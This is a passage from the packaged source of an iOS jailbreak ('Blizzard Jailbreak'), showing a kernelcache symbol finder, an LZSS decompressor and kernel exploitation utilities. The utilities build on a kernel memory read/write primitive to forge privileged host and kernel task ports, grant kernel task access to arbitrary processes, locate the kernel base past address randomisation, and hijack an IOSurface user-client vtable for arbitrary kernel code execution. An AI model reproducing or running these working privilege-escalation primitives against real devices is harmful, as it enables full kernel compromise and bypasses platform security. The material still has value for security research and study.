sizeof(struct load_command));\n            if (verbose) printf(\"SymbolFinder: LOAD COMMAND %d = 0x%x\\n\", i, cmd->cmd);\n            offset += cmd->cmdsize;\n            if (cmd->cmd == LC_SYMTAB) {\n                if (verbose) printf(\"SymbolFinder: Found LC_SYMTAB command!\\n\");\n                struct symtab_command *symtab = load_bytes(file, offset, cmd->cmdsize);\n                
if (verbose) printf(\"\\t %d symbols\\n\", symtab->nsyms);\n                if (verbose) printf(\"\\t Symbol table at 0x%x\\n\", symtab->symoff);\n                for (int i = 0; i < symtab->nsyms; i++) {\n                    struct symbol *sym = load_bytes(file, symtab->symoff + sym_offset, sizeof(struct symbol));\n                    int symlen = 0;\n                    int sym_str_addr = sym->table_index + symtab->stroff;\n                    uint8_t *byte = load_bytes(file, sym_str_addr+symlen, 1);\n                    \n                    while (*byte != 0) {\n                        free(byte);\n                        symlen++;\n                        byte = load_bytes(file, sym_str_addr+symlen, 1);\n                    }\n                    free(byte);\n                    char *sym_name = load_bytes(file, sym_str_addr, symlen + 1);\n                    if (verbose) printf(\"\\t%s: 0x%llx\\n\", sym_name, sym->address);\n                    if (!strcmp(sym_name, symbol)) {\n                        addr = sym->address;\n                        if (!verbose) return addr;\n                    }\n                    free(sym_name);\n                    sym_offset += sizeof(struct symbol);\n                    free(sym);\n                }\n                free(symtab);\n                free(cmd);\n                break;\n            }\n            offset += cmd->cmdsize;\n            free(cmd);\n        }\n    }\n    else {\n        if (verbose) printf(\"[!] 
Unrecognized file\\n\");\n        return -1;\n    }\n    return addr;\n}\n\nuint32_t find_macho_header() {\n    uint32_t off = 0;\n    uint32_t *magic = load_bytes(file, off, sizeof(uint32_t));\n    while ((*magic & ~1) != 0xFEEDFACE) {\n        off++;\n        magic = load_bytes(file, off, sizeof(uint32_t));\n    }\n    return off - 1;\n}\n\nint decompressKernelCache(const char *kernelcache) {\n    file = fopen(kernelcache, \"rb\");\n    offset = find_macho_header();\n    if (!offset) {\n        printf(\"SymbolFinder: offset = 0; This is not a Mach-O Binary!\\n\");\n        return -1;\n    }\n    printf(\"SymbolFinder: Mach-o header at 0x%X\\n\", offset);\n    char strOff[128];\n    sprintf(strOff, \"0x%X\", offset);\n    char *args[5] = { strdup(\"lzssdec\"), strdup(\"-o\"), strdup(strOff), strdup(kernelcache), strcat(strdup(kernelcache), \".dec\")};\n    \n    if (lzssdec(5, (char **)args)) {\n        printf(\"SymbolFinder: Failed to decompress the Kernel!\\n\");\n        return -1;\n    }\n    else printf(\"SymbolFinder: Successfully decompressed the KernelCache!\\n\");\n    fclose(file);\n    file = fopen(strcat(strdup(kernelcache), \".dec\"), \"rb\");\n    return 0;\n}\n"
  },
  {
    "path": "Kernel Utilities/kernSymbolication.h",
    "content": "//\n//  kernSymbolication.h\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 8/11/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#ifndef kernSymbolication_h\n#define kernSymbolication_h\n\n#import <unistd.h>\n#import <stdio.h>\n#import <stdlib.h>\n#import <string.h>\n#import <stdbool.h>\n#import <mach-o/loader.h>\n#import <mach-o/swap.h>\n\n\n// dunno if the built-in headers have something like this but I couldn't find any so DIY :)\nstruct symbol {\n    uint32_t table_index;\n    uint8_t type;\n    uint8_t section_index;\n    uint16_t description;\n    uint64_t address;\n};\n\nuint32_t find_macho_header(void);\nuint64_t find_symbol(const char *symbol, bool verbose);\nint decompressKernelCache(const char *kernelcache);\n#endif /* kernSymbolication_h */\n"
  },
  {
    "path": "Kernel Utilities/kernel_utils.h",
    "content": "#ifndef kernUtils_h\n#define kernUtils_h\n#import <stdio.h>\n#import <mach-o/loader.h>\n#import <stdlib.h>\n#import <fcntl.h>\n#import <unistd.h>\n#import <errno.h>\n#import <mach/mach.h>\n#import <sys/stat.h>\n#include <stdbool.h>\n\n// Needed definitions\nkern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);\nkern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);\nkern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);\nkern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);\nkern_return_t mach_vm_protect (vm_map_t target_task, mach_vm_address_t address,  mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection);\nkern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);\nkern_return_t mach_vm_region(vm_map_t target_task, mach_vm_address_t *address, mach_vm_size_t *size, vm_region_flavor_t flavor, vm_region_info_t info, mach_msg_type_number_t *infoCnt, mach_port_t *object_name);\n\nbool PatchHostPriv(mach_port_t host);\n// init function\nvoid init_kernel_utils(mach_port_t tfp0);\n\n// utils\nuint64_t TaskSelfAddr(void);\nuint64_t IPCSpaceKernel(void);\nuint64_t FindPortAddress(mach_port_name_t port);\nmach_port_t FakeHostPriv(void);\nvoid convertPortToTaskPort(mach_port_t port, uint64_t space, uint64_t task_kaddr);\nvoid MakePortFakeTaskPort(mach_port_t port, uint64_t task_kaddr);\nint Kernel_strcmp(uint64_t kstr, const char* str);\n\n// for messing with processes\nuint64_t proc_of_pid(pid_t pid);\nuint64_t proc_of_procName(char *nm);\nunsigned int pid_of_procName(char *nm);\nuint64_t taskStruct_of_pid(pid_t pid);\nuint64_t taskStruct_of_procName(char *nm);\nuint64_t 
taskPortKaddr_of_pid(pid_t pid);\nuint64_t taskPortKaddr_of_procName(char *nm);\nmach_port_t task_for_pid_in_kernel(pid_t pid);\n\n// used to fix what kexecute returns\ntypedef struct {\n    uint64_t prev;\n    uint64_t next;\n    uint64_t start;\n    uint64_t end;\n} kmap_hdr_t;\nuint64_t ZmFixAddr(uint64_t addr);\n\nuint64_t grabKernelBase(void);\n#endif\n"
  },
  {
    "path": "Kernel Utilities/kernel_utils.m",
    "content": "\n#import \"kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import \"../Exploits/sock_port/offsets.h\"\n#import \"kexecute.h\"\n#include \"../Exploits/sock_port/kernel_memory.h\"\n#include <stdbool.h>\n#include <spawn.h>\n#import <Foundation/Foundation.h>\n\nstatic mach_port_t tfpzero;\n\nvoid init_kernel_utils(mach_port_t tfp0) {\n    tfpzero = tfp0;\n}\n\nint Kernel_strcmp(uint64_t kstr, const char* str) {\n    // XXX be safer, dont just assume you wont cause any\n    // page faults by this\n    size_t len = strlen(str) + 1;\n    char *local = malloc(len + 1);\n    local[len] = '\\0';\n    \n    int ret = 1;\n    \n    if (kread(kstr, local, len) == len) {\n        ret = strcmp(local, str);\n    }\n    \n    free(local);\n    \n    return ret;\n}\n\nuint64_t TaskSelfAddr() {\n    uint64_t selfproc = proc_of_pid(getpid());\n    if (selfproc == 0) {\n        fprintf(stderr, \"Kernel Utils: failed to find our task addr\\n\");\n        return -1;\n    }\n    uint64_t addr = rk64(selfproc + off_task);\n    \n    uint64_t task_addr = addr;\n    uint64_t itk_space = rk64(task_addr + off_itk_space);\n    \n    uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n    \n    uint32_t port_index = mach_task_self() >> 8;\n    const int sizeof_ipc_entry_t = 0x18;\n    \n    uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t));\n    \n    return port_addr;\n}\n\nuint64_t IPCSpaceKernel() {\n    return rk64(TaskSelfAddr() + 0x60);\n}\n\nuint64_t FindPortAddress(mach_port_name_t port) {\n   \n    uint64_t task_port_addr = TaskSelfAddr();\n    //uint64_t task_addr = TaskSelfAddr();\n    uint64_t task_addr = rk64(task_port_addr + off_ip_kobject);\n    uint64_t itk_space = rk64(task_addr + off_itk_space);\n    \n    uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n    \n    uint32_t port_index = port >> 8;\n    const int sizeof_ipc_entry_t = 0x18;\n\n    uint64_t 
port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t));\n\n    return port_addr;\n}\n\nmach_port_t FakeHostPriv_port = MACH_PORT_NULL;\n\nbool PatchHostPriv(mach_port_t host) {\n    \n#define IO_ACTIVE 0x80000000\n#define IKOT_HOST_PRIV 4\n    \n    // locate port in kernel\n    uint64_t host_kaddr = FindPortAddress(host);\n    \n    // change port host type\n    uint32_t old = rk32(host_kaddr + 0x0);\n    printf(\"Kernel Utils: Old host type: 0x%x\\n\", old);\n    \n    wk32(host_kaddr + 0x0, IO_ACTIVE | IKOT_HOST_PRIV);\n    \n    uint32_t new = rk32(host_kaddr);\n    printf(\"Kernel Utils: New host type: 0x%x\\n\", new);\n    \n    return ((IO_ACTIVE | IKOT_HOST_PRIV) == new) ? true : false;\n}\n\n// build a fake host priv port\nmach_port_t FakeHostPriv() {\n    if (FakeHostPriv_port != MACH_PORT_NULL) {\n        return FakeHostPriv_port;\n    }\n    // get the address of realhost:\n    uint64_t hostport_addr = FindPortAddress(mach_host_self());\n    uint64_t realhost = rk64(hostport_addr + off_ip_kobject);\n    \n    // allocate a port\n    mach_port_t port = MACH_PORT_NULL;\n    kern_return_t err;\n    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);\n    if (err != KERN_SUCCESS) {\n        printf(\"Kernel Utils: failed to allocate port\\n\");\n        return MACH_PORT_NULL;\n    }\n    // get a send right\n    mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\n    \n    // make sure port type has IKOT_HOST_PRIV\n    PatchHostPriv(port);\n    \n    // locate the port\n    uint64_t port_addr = FindPortAddress(port);\n\n    // change the space of the port\n    wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), IPCSpaceKernel());\n    \n    // set the kobject\n    wk64(port_addr + off_ip_kobject, realhost);\n    \n    FakeHostPriv_port = port;\n    \n    return port;\n}\n\nuint64_t Kernel_alloc_wired(uint64_t size) {\n    if (tfpzero == MACH_PORT_NULL) {\n        printf(\"Kernel Utils: 
Attempt to allocate kernel memory before any kernel memory write primitives available\\n\");\n        sleep(3);\n        return 0;\n    }\n    \n    kern_return_t err;\n    mach_vm_address_t addr = 0;\n    mach_vm_size_t ksize = round_page_kernel(size);\n    \n    printf(\"Kernel Utils: vm_kernel_page_size: %lx\\n\", vm_kernel_page_size);\n    \n    err = mach_vm_allocate(tfpzero, &addr, ksize+0x4000, VM_FLAGS_ANYWHERE);\n    if (err != KERN_SUCCESS) {\n        printf(\"Kernel Utils: unable to allocate kernel memory via tfp0: %s %x\\n\", mach_error_string(err), err);\n        sleep(3);\n        return 0;\n    }\n    \n    printf(\"Kernel Utils: allocated address: %llx\\n\", addr);\n    \n    addr += 0x3fff;\n    addr &= ~0x3fffull;\n    \n    printf(\"Kernel Utils: address to wire: %llx\\n\", addr);\n    \n    err = mach_vm_wire(FakeHostPriv(), tfpzero, addr, ksize, VM_PROT_READ|VM_PROT_WRITE);\n    if (err != KERN_SUCCESS) {\n        printf(\"Kernel Utils: unable to wire kernel memory via tfp0: %s %x\\n\", mach_error_string(err), err);\n        sleep(3);\n        return 0;\n    }\n    return addr;\n}\n\nconst uint64_t kernel_address_space_base = 0xffff000000000000;\nvoid Kernel_memcpy(uint64_t dest, uint64_t src, uint32_t length) {\n    if (dest >= kernel_address_space_base) {\n        // copy to kernel:\n        kwrite(dest, (void*) src, length);\n    } else {\n        // copy from kernel\n        kread(src, (void*)dest, length);\n    }\n}\n\nvoid convertPortToTaskPort(mach_port_t port, uint64_t space, uint64_t task_kaddr) {\n    // now make the changes to the port object to make it a task port:\n    uint64_t port_kaddr = FindPortAddress(port);\n    \n    wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), 0x80000000 | 2);\n    wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES), 0xf00d);\n    wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS), 0xf00d);\n    wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), space);\n  
  wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT),  task_kaddr);\n    \n    // swap our receive right for a send right:\n    uint64_t task_port_addr = TaskSelfAddr();\n    uint64_t task_addr = rk64(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n    uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));\n    uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));\n    \n    uint32_t port_index = port >> 8;\n    const int sizeof_ipc_entry_t = 0x18;\n    uint32_t bits = rk32(is_table + (port_index * sizeof_ipc_entry_t) + 8); // 8 = offset of ie_bits in struct ipc_entry\n    \n#define IE_BITS_SEND (1<<16)\n#define IE_BITS_RECEIVE (1<<17)\n    \n    bits &= (~IE_BITS_RECEIVE);\n    bits |= IE_BITS_SEND;\n    \n    wk32(is_table + (port_index * sizeof_ipc_entry_t) + 8, bits);\n}\n\nvoid MakePortFakeTaskPort(mach_port_t port, uint64_t task_kaddr) {\n    convertPortToTaskPort(port, IPCSpaceKernel(), task_kaddr);\n}\n\nuint64_t proc_of_pid(pid_t proc_pid) {\n    uint64_t proc = rk64(Find_allproc());\n    while (proc) {\n        uint32_t pid = (uint32_t)rk32(proc + off_p_pid);\n        if (pid == proc_pid){\n            return proc;\n        }\n        proc = rk64(proc);\n    }\n    \n    return 0;\n}\n\nuint64_t proc_of_procName(char *nm) {\n    uint64_t proc = rk64(Find_allproc());\n    char name[40] = {0};\n    while (proc) {\n        kread(proc + off_p_comm, name, 40); //read 20 bytes off the process's name and compare\n        if (strstr(name, nm)) return proc;\n        proc = rk64(proc);\n    }\n    return 0;\n}\n\nunsigned int pid_of_procName(char *nm) {\n    uint64_t proc = rk64(Find_allproc());\n    char name[40] = {0};\n    while (proc) {\n        kread(proc + off_p_comm, name, 40);\n        if (strstr(name, nm)) return rk32(proc + off_p_pid);\n        proc = rk64(proc);\n    }\n    return 0;\n}\n\nuint64_t taskStruct_of_pid(pid_t pid) {\n    uint64_t task_kaddr = rk64(TaskSelfAddr() + 
koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n    while (task_kaddr) {\n        uint64_t proc = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n        uint32_t pd = rk32(proc + off_p_pid);\n        if (pd == pid) return task_kaddr;\n        task_kaddr = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_PREV));\n    }\n    return 0;\n}\n\nuint64_t taskStruct_of_procName(char *nm) {\n    uint64_t task_kaddr = rk64(TaskSelfAddr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n    char name[40] = {0};\n    while (task_kaddr) {\n        uint64_t proc = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n        kread(proc + off_p_comm, name, 40);\n        if (strstr(name, nm)) return task_kaddr;\n        task_kaddr = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_PREV));\n    }\n    return 0;\n}\n\nuint64_t taskPortKaddr_of_pid(pid_t pid) {\n    uint64_t proc = proc_of_pid(pid);\n    if (!proc) {\n        printf(\"Kernel Utils: Failed to find proc of pid %d\\n\", pid);\n        return 0;\n    }\n    uint64_t task = rk64(proc + off_task);\n    uint64_t itk_space = rk64(task + off_itk_space);\n    uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n    uint64_t task_port_kaddr = rk64(is_table + 0x18);\n    return task_port_kaddr;\n}\n\nuint64_t taskPortKaddr_of_procName(char *nm) {\n    uint64_t proc = proc_of_procName(nm);\n    if (!proc) {\n        printf(\"Kernel Utils: Failed to find proc of process %s\\n\", nm);\n        return 0;\n    }\n    uint64_t task = rk64(proc + off_task);\n    uint64_t itk_space = rk64(task + off_itk_space);\n    uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n    uint64_t task_port_kaddr = rk64(is_table + 0x18);\n    return task_port_kaddr;\n}\n\n// Original method by Ian Beer\nmach_port_t task_for_pid_in_kernel(pid_t pid) {\n    \n    // allocate a new port we have a send right to\n    mach_port_t port = MACH_PORT_NULL;\n    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);\n   
 mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\n    \n    // find task port in kernel\n    uint64_t task_port_kaddr = taskPortKaddr_of_pid(pid);\n    uint64_t task = rk64(proc_of_pid(pid) + off_task);\n    \n    // leak some refs\n    wk32(task_port_kaddr + 0x4, 0x383838);\n    wk32(task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT), 0x393939);\n    \n    // get the address of the ipc_port of our allocated port\n    uint64_t selfproc = proc_of_pid(getpid());\n    if (!selfproc) {\n        printf(\"Kernel Utils: Failed to find our proc?\\n\");\n        return MACH_PORT_NULL;\n    }\n    uint64_t selftask = rk64(selfproc + off_task);\n    uint64_t itk_space = rk64(selftask + off_itk_space);\n    uint64_t is_table = rk64(itk_space + off_ipc_space_is_table);\n    uint32_t port_index = port >> 8;\n    \n    // point the port's ie_object to the task port\n    wk64(is_table + (port_index * 0x18), task_port_kaddr);\n    \n    // remove our recieve right\n    uint32_t ie_bits = rk32(is_table + (port_index * 0x18) + 8);\n    ie_bits &= ~(1 << 17); // clear MACH_PORT_TYPE(MACH_PORT_RIGHT_RECIEVE)\n    wk32(is_table + (port_index * 0x18) + 8, ie_bits);\n    \n    return port;\n}\n\nuint64_t ZmFixAddr(uint64_t addr) {\n    static kmap_hdr_t zm_hdr = {0, 0, 0, 0};\n    \n    if (zm_hdr.start == 0) {\n        // xxx rk64(0) ?!\n        uint64_t zone_map = rk64(Find_zone_map_ref());\n        // hdr is at offset 0x10, mutexes at start\n        size_t r = kread(zone_map + 0x10, &zm_hdr, sizeof(zm_hdr));\n        //printf(\"zm_range: 0x%llx - 0x%llx (read 0x%zx, exp 0x%zx)\\n\", zm_hdr.start, zm_hdr.end, r, sizeof(zm_hdr));\n        \n        if (r != sizeof(zm_hdr) || zm_hdr.start == 0 || zm_hdr.end == 0) {\n            printf(\"Kernel Utils: kread of zone_map failed!\\n\");\n            return 1;\n        }\n        \n        if (zm_hdr.end - zm_hdr.start > 0x100000000) {\n            printf(\"Kernel Utils: zone_map is too big, sorry.\\n\");\n            
return 1;\n        }\n    }\n    \n    uint64_t zm_tmp = (zm_hdr.start & 0xffffffff00000000) | ((addr) & 0xffffffff);\n    \n    return zm_tmp < zm_hdr.start ? zm_tmp + 0x100000000 : zm_tmp;\n}\n\nuint64_t grabKernelBase() {\n    printf(\"Obtaining KASLR slide...\\n\");\n    \n#define slid_base  base+slide\n    uint64_t base = 0xFFFFFFF007004000;\n    uint32_t slide = 0x21000000;\n    uint32_t data = rk32(slid_base);\n    \n    for(;;) {\n        while (data != 0xFEEDFACF) {\n            slide -= 0x200000;\n            data = rk32(slid_base);\n        }\n        \n        printf(\"Found 0xfeedfacf Mach-O header at 0x%llx, checking...\\n\", slid_base);\n        \n        char buf[0x120];\n        for (uint64_t addr = slid_base; addr < slid_base + 0x2000; addr += 8 /* 64 bits / 8 bits / byte = 8 bytes */) {\n            kread(addr, buf, 0x120); // read 0x120 bytes into a char buffer\n            \n            if (!strcmp(buf, \"__text\") && !strcmp(buf + 16, \"__PRELINK_TEXT\")) { // found it!\n                printf(\"\\t  The Kernel base at 0x%llx\\n\", slid_base);\n                printf(\"\\t  KASLR slide is 0x%x\\n\", slide);\n                printf(\"\\t  Kernel header is 0x%x\\n\", rk32(slid_base));\n                return slid_base;\n            }\n            data = 0;\n        }\n        printf(\"\\tCould not find __text and __PRELINK_TEXT, trying again!\\n\");\n    }\n    return 0;\n}\n"
  },
  {
    "path": "Kernel Utilities/kexecute.c",
    "content": "#import <pthread.h>\n#import \"kernel_utils.h\"\n#import \"kexecute.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import \"../Exploits/sock_port/include/IOKit/IOKitLib.h\"\n#include \"../Exploits/sock_port/kernel_memory.h\"\n\ntypedef int (*kexecFunc)(uint64_t function, size_t argument_count, ...);\nkexecFunc kernel_exec;\n\nmach_port_t PrepareUserClient(void){\n  kern_return_t err;\n  mach_port_t UserClient;\n  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IOSurfaceRoot\"));\n  if (service == IO_OBJECT_NULL){\n    printf(\"Kernel Execute: unable to find service.\\n\");\n    exit(EXIT_FAILURE);\n  }\n  err = IOServiceOpen(service, mach_task_self(), 0, &UserClient);\n  if (err != KERN_SUCCESS){\n    printf(\"Kernel Execute: unable to get user client connection.\\n\");\n    exit(EXIT_FAILURE);\n  }\n  printf(\"Kernel Execute: got user client: 0x%x\\n\", UserClient);\n  return UserClient;\n}\n\npthread_mutex_t kexecuteLock;\nstatic mach_port_t UserClient = 0;\nstatic uint64_t IOSurfaceRootUserClient_Port = 0;\nstatic uint64_t IOSurfaceRootUserClient_Addr = 0;\nstatic uint64_t FakeVtable = 0;\nstatic uint64_t FakeClient = 0;\nconst int fake_Kernel_alloc_size = 0x1000;\n\nvoid initializeKernelExecute(void) {\n    UserClient = PrepareUserClient();\n    IOSurfaceRootUserClient_Port = FindPortAddress(UserClient);\n    IOSurfaceRootUserClient_Addr = rk64(IOSurfaceRootUserClient_Port + off_ip_kobject);\n    uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_Addr);\n    FakeVtable = kalloc(fake_Kernel_alloc_size);\n    for (int i = 0; i < 0x200; i++) {\n        wk64(FakeVtable+i*8, rk64(IOSurfaceRootUserClient_vtab+i*8));\n    }\n    FakeClient = kalloc(fake_Kernel_alloc_size);\n    for (int i = 0; i < 0x200; i++) {\n        wk64(FakeClient+i*8, rk64(IOSurfaceRootUserClient_Addr+i*8));\n    }\n    wk64(FakeClient, FakeVtable);\n    
wk64(IOSurfaceRootUserClient_Port + off_ip_kobject, FakeClient);\n    wk64(FakeVtable+8*off_getExternelTrapForIndex, Find_add_x0_x0_0x40_ret());\n\n    pthread_mutex_init(&kexecuteLock, NULL);\n    if (UserClient){\n        printf(\"Kernel Execute: Successfully initialized Kernel Execute Module! \\n\");\n        return;\n    } else {\n        printf(\"Kernel Execute: Failed to initialize Kernel Execute Module! \\n\");\n        return;\n    }\n}\n\nvoid terminateKernelExecute(void){\n    if (!UserClient) return;\n    wk64(IOSurfaceRootUserClient_Port + off_ip_kobject, IOSurfaceRootUserClient_Addr);\n    kfree(FakeVtable, fake_Kernel_alloc_size);\n    kfree(FakeClient, fake_Kernel_alloc_size);\n}\n\nuint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {\n    if (kernel_exec) {\n        return kernel_exec(addr, 7, x0, x1, x2, x3, x4, x5, x6);\n    }\n    pthread_mutex_lock(&kexecuteLock);\n    uint64_t offx20 = rk64(FakeClient+0x40);\n    uint64_t offx28 = rk64(FakeClient+0x48);\n    wk64(FakeClient+0x40, x0);\n    wk64(FakeClient+0x48, addr);\n    uint64_t returnval = IOConnectTrap6(UserClient, 0, (uint64_t)(x1), (uint64_t)(x2), (uint64_t)(x3), (uint64_t)(x4), (uint64_t)(x5), (uint64_t)(x6));\n    wk64(FakeClient+0x40, offx20);\n    wk64(FakeClient+0x48, offx28);\n    pthread_mutex_unlock(&kexecuteLock);\n    return returnval;\n}\n"
  },
  {
    "path": "Kernel Utilities/kexecute.h",
    "content": "#import <mach/mach.h>\n#import <inttypes.h>\n\nuint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);\nvoid initializeKernelExecute(void);\nvoid terminateKernelExecute(void);\n"
  },
  {
    "path": "Kernel Utilities/lzssdec.cpp",
    "content": "//\n//  lzssdec.cpp\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 8/11/20.\n//  Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#include \"lzssdec.hpp\"\n// (C)2009 Willem Hengeveld  itsme@xs4all.nl\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <stdint.h>\n#include <string.h>\n#include <algorithm>\n\n// streaming version of the lzss algorithm, as defined in BootX-75/bootx.tproj/sl.subproj/lzss.c\n// you can use lzssdec in a filter, like:\n//\n// cat file.lzss | lzssdec > file.decompressed\n//\nstatic int g_debug= 0;\n\nclass lzssdecompress\n{\n    enum { COPYFROMDICT, EXPECTINGFLAG, PROCESSFLAGBIT, EXPECTING2NDBYTE };\n    int _state;\n    uint8_t _flags;\n    int _bitnr;\n    uint8_t *_src, *_srcend;\n    uint8_t *_dst, *_dstend;\n    uint8_t _firstbyte;\n    \n    uint8_t *_dict;\n    \n    int _dictsize;\n    int _maxmatch;\n    int _copythreshold;\n    \n    int _dictptr;\n    \n    int _copyptr;\n    int _copycount;\n    \n    int _inputoffset;\n    int _outputoffset;\npublic:\n    lzssdecompress()\n    {\n        _maxmatch= 18;  // 4 bit size + threshold\n        _dictsize= 4096; // 12 bit size\n        _copythreshold= 3; // 0 == copy 3 bytes\n        _dict= new uint8_t[_dictsize+_maxmatch-1];\n        \n        reset();\n    }\n    ~lzssdecompress()\n    {\n        delete[] _dict;\n        _dict= 0; _dictsize= 0;\n    }\n    void reset()\n    {\n        _state=EXPECTINGFLAG;\n        _flags= 0; _bitnr= 0;\n        _src=_srcend=_dst=_dstend=0;\n        memset(_dict, ' ', _dictsize+_maxmatch-1);\n        _dictptr= _dictsize-_maxmatch;\n        _inputoffset= 0;\n        _outputoffset= 0;\n        _firstbyte= 0;\n        _copyptr= 0;\n        _copycount= 0;\n    }\n    void decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uint8_t *src, uint32_t srclen, uint32_t *psrcused)\n    {\n        _src= src;  _srcend= src+srclen;\n        _dst= dst;  _dstend= dst+dstlen;\n        \n        while 
(_src<_srcend && _dst<_dstend)\n        {\n            switch(_state)\n            {\n                case EXPECTINGFLAG:\n                    if (g_debug) fprintf(stderr, \"%08x,%08x: flag: %02x\\n\", _inputoffset, _outputoffset, *_src);\n                    _flags= *_src++;\n                    _inputoffset++;\n                    _bitnr= 0;\n                    _state= PROCESSFLAGBIT;\n                    break;\n                case PROCESSFLAGBIT:\n                    if (_flags&1) {\n                        if (g_debug) fprintf(stderr, \"%08x,%08x: bit%d: %03x copybyte %02x\\n\", _inputoffset, _outputoffset, _bitnr, _dictptr, *_src);\n                        addtodict(*_dst++ = *_src++);\n                        _inputoffset++;\n                        _outputoffset++;\n                        nextflagbit();\n                    }\n                    else {\n                        _firstbyte= *_src++;\n                        _inputoffset++;\n                        _state= EXPECTING2NDBYTE;\n                    }\n                    break;\n                case EXPECTING2NDBYTE:\n                {\n                    uint8_t secondbyte= *_src++;\n                    _inputoffset++;\n                    setcounter(_firstbyte, secondbyte);\n                    if (g_debug) fprintf(stderr, \"%08x,%08x: bit%d: %03x %02x %02x : copy %d bytes from %03x\", _inputoffset-2, _outputoffset, _bitnr, _dictptr, _firstbyte, secondbyte, _copycount, _copyptr);\n                    if (g_debug) dumpcopydata();\n                    _state= COPYFROMDICT;\n                }\n                    break;\n                case COPYFROMDICT:\n                    copyfromdict();\n                    break;\n            }\n        }\n        if (g_debug) fprintf(stderr, \"decompress state= %d, copy: 0x%x, 0x%x\\n\", _state, _copyptr, _copycount);\n        if (pdstused) *pdstused= _dst-dst;\n        if (psrcused) *psrcused= _src-src;\n    }\n    void flush(uint8_t *dst, uint32_t 
dstlen, uint32_t *pdstused)\n    {\n        if (g_debug) fprintf(stderr, \"flash before state= %d, copy: 0x%x, 0x%x\\n\", _state, _copyptr, _copycount);\n        _src= _srcend= NULL;\n        _dst= dst;  _dstend= dst+dstlen;\n        \n        if (_state==COPYFROMDICT)\n            copyfromdict();\n        \n        if (pdstused) *pdstused= _dst-dst;\n        if (g_debug) fprintf(stderr, \"flash after state= %d, copy: 0x%x, 0x%x\\n\", _state, _copyptr, _copycount);\n    }\n    void copyfromdict()\n    {\n        while (_dst<_dstend && _copycount)\n        {\n            addtodict(*_dst++ = _dict[_copyptr++]);\n            _outputoffset++;\n            _copycount--;\n            _copyptr= _copyptr&(_dictsize-1);\n        }\n        if (_copycount==0)\n            nextflagbit();\n    }\n    void dumpcopydata()\n    {\n        // note: we are printing incorrect data, if _copyptr == _dictptr-1\n        for (int i=0 ; i<_copycount ; i++)\n            fprintf(stderr, \" %02x\", _dict[(_copyptr+i)&(_dictsize-1)]);\n        fprintf(stderr, \"\\n\");\n    }\n    void addtodict(uint8_t c)\n    {\n        _dict[_dictptr++]= c;\n        _dictptr = _dictptr&(_dictsize-1);\n    }\n    void nextflagbit()\n    {\n        _bitnr++;\n        _flags>>=1;\n        _state = _bitnr==8 ? EXPECTINGFLAG : PROCESSFLAGBIT;\n    }\n    void setcounter(uint8_t first, uint8_t second)\n    {\n        _copyptr= first | ((second&0xf0)<<4);\n        _copycount= _copythreshold + (second&0xf);\n    }\n};\n\nvoid usage(int argc,char**argv)\n{\n    char *name = NULL;\n    name = strrchr(argv[0], '/');\n    fprintf(stderr, \"Usage: %s [-d] [-o OFFSET] <kernelcache> <output>\\n\",(name ? name + 1: argv[0]));\n}\nextern \"C\" int lzssdec(int argc,char**argv)\n{\n    FILE 